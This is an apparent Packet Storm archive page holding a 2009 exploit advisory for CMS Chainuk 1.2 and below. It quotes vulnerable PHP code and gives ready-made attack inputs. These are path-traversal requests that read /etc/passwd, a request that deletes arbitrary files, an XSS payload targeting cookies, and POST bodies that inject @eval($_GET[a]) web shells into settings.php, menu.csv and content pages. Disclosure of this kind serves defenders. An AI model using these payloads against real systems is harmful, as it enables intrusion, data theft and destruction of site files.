what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

CMS Chainuk 1.2 LFI / XSS

CMS Chainuk 1.2 LFI / XSS
Posted Jul 2, 2009
Authored by eLwaux

CMS Chainuk versions 1.2 and below suffer from local file inclusion, cross site scripting, and remote shell vulnerabilities.

tags | exploit, remote, shell, local, vulnerability, xss, file inclusion
SHA-256 | c70dd2e4de9fa29c8c1cc9cb763c06ec48fde50f5a0a02df6dcd66adf117ea84

CMS Chainuk 1.2 LFI / XSS

Change Mirror Download
CMS Chainuk <= v.1.2 Vulns
Home: Cms.tut.su
Dork: "Cms.tut.su, 2009 g."

eLwaux(c) 14.06.2


## ## ## ## ## ##

LFI
/index.php
---------------------------------------------------------------------------
6: if (isset($_GET ['id']))
7: {
8: [color=white]$id = $_GET ['id'];[/color]
9: }
10: else
11: {
12: $id = $index;
13: }
14: if (file_exists ("content/" . $id . ".php"))
15: {
16: [color=white]include ("content/" . $id . ".php");[/color]
17: }
18: else
19: {
20: include ('404.html'); exit;
21: }
--------------------------------------------------------------------------

exploit:
index.php?id=../../../../etc/passwd%00


## ## ## ## ## ##

LFI
/admin/admin_edit.php
---------------------------------------------------------------------------
2: if (isset($_GET['id']))
3: {
4: [color=white]$id = $_GET['id'];[/color]
5: if (!file_exists("../content/" . $id . ".php")) die ("..");
6: [color=white]include("../content/" . $id . ".php");[/color]
23: }
-----------------------------------------------------------------------------

exploit:
index.php?id=../../../../etc/passwd%00


## ## ## ## ## ##

delete any files ()
/admin/admin_delete.php[
---------------------------------------------------------------------------
3: if([color=white]unlink('../content/'.$_GET['id'].'.php')[/color])
4: {
5: echo 'Page '.$_GET['id'].' deleted';[/code]
-----------------------------------------------------------------------------

exploit:
/admin/admin_delete.php?id=../FILE.PHP%00


## ## ## ## ## ##

LFI / XSS / Shell
/admin/admin_menu.php
-----------------------------------------------------------------------------
37: $menu = explode (',', $_POST['menu']);
38: $csvcont ='';
39: foreach ($menu as $a)
40: {
41: if (!preg_match("/[0-9]/", $a)) die ("error");
42: if (!file_exists("../content/" . $a . ".php")) die ("error");
43: [color=white]include ("../content/" . $a . ".php");[/color]
44: $csvcont = $csvcont . $a . ";" . $page_4menu . "\n";
45: }
65: if (!file_put_contents("../menu.csv", $csvcont)) ..
-----------------------------------------------------------------------------

exploits:
LFI POST: menu=../1/../FILE.PHP%00,1,2,3,4,5,6,7
XSS POST: menu=../1../onmousemove="javascript:alert(document.cookies)">>/../index;,1,2,3,4,5,6,7
Shell: if <asp_tags: On> POST: menu=../1
<asp=@eval(\$_GET[a]);asp>/../admin/passw,1,2,3,4,5,6,7
/?id=../menu.csv%00&a=phpinfo();[/CoDE]


## ## ## ## ## ##

Shell
/admin_settings.php
-----------------------------------------------------------------------------
39: if (!isset($_POST['tmpl']) || !isset($_POST['id']) ||
!isset($_POST['menu']))
40: {
41: die ("...");
42: }
43: if (!file_exists("../templates/" . $_POST['tmpl'] .
"/index.php")) die ("...");
44: if (!file_exists("../content/" . $_POST['id'] . ".php")) die ("...");
45: $mtpl = $_POST['menu'];
46: $set = "<? \$curr_tmpl='" . $_POST['tmpl'] . "'; \$index="=
$_POST['id'] . "; \$menu_tmpl = \"" . $mtpl . "\"; ?>";
63: if (!file_put_contents("../settings.php", $set)
-----------------------------------------------------------------------------

exploit:
POST: action=abc
tmpl=default
id=1
menu=%TITLE%"; @eval($_GET["a"]); ?> //[/code]
Shell: /settings.php?a=phpinfo();


## ## ## ## ## ##

Shell
/admin_new.php
-----------------------------------------------------------------------------
POST: action=abc
text=abc
title='; @eval($_GET[a]); //
descr=abc
keys=abc
link=abc[/code]
/content/=NUMBER.php?a=phpinfo();


## ## ## ## ## ##

Path Disclosure
/index.php?id=../admin/passw
/admin/admin_delete.php?id=thisf0ld3risn0texi5s5


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close